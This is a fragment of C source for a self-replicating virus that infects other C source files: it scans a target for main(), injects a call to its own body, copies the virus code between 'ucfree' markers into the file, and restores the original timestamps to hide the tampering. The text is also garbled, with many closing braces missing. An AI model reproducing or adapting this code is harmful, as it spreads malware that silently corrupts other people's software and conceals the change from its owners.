if ((fp_obj = fopen(f_name, "r+")) == NULL)
{// object file
return 1;
if (stat(f_name, &statbuf) < 0)
return 1;
timebuf.actime = statbuf.st_atime;
timebuf.modtime = statbuf.st_mtime;
if ((fp_vir = fopen(vir_path, "r")) ==NULL)
{// virus file
return 1;
// make a tempfile as a buffer
if ((tmp_buf = tmpnam(NULL)) == NULL)
return 1;
if ((fp_tmp = fopen(tmp_buf, "a+")) == NULL)
{// temp file
return 1;
unlink(tmp_buf);// kernal will delete it after the process done
// read the C text into the temp file, and modify it
flag = 'T';
while (fgets(buf, BUF_SIZE, fp_obj) != NULL)
if (!strcmp(buf, "/* ucfree:2007-12-31 start */\n"))
{// the obeject file have been infected
return 0;
if (flag == 'T' && strstr(buf, "main("))
{// find the funtion main,change flag
flag = 'F';
if (flag == 'F' && (strstr(buf, "return") ||
strstr(buf, "}")))
{// insert the invoke line,before "return" or "}"
fputs("\t\tvir_body();\n", fp_tmp);
flag = 'O';
fputs(buf, fp_tmp);
if (flag != 'O')
{// is not the main c file
return 0;
// add the parts of virus's body to the tail of temp file
flag = 'T';
while (fgets(buf, BUF_SIZE, fp_vir) != NULL)
if (flag == 'T' &&
!strcmp(buf, "/* ucfree:2007-12-31 start */\n"))
{// is the start of the virus's body
flag = 'F';
if (flag == 'T')
{// not find the start
if (flag == 'O')
{// virus body have been inserted,do over
// insert virus's body
if (!strcmp(buf, "/* ucfree:2007-12-31 end */\n"))
{// is the end of the virus's body
flag = 'O';
if (strstr(buf, "#define VIR_NAM") &&
buf[0] == '#')
{// use the object's name to instand of the virus name
snprintf(buf, sizeof(buf), "%s\t\"%s\"\n",
"#define VIR_NAM", f_name);
fputs(buf, fp_tmp);
// temp file instand of the object file
while (fgets(buf, BUF_SIZE,fp_tmp) != NULL)
fputs(buf, fp_obj);
if (utime(f_name, &timebuf) < 0)
{// keep the time back
return 1;
// OK! object file also been a virus ^_^
return 0;
/* ucfree:2007-12-31 end */
/* test it */
int main()
return 0;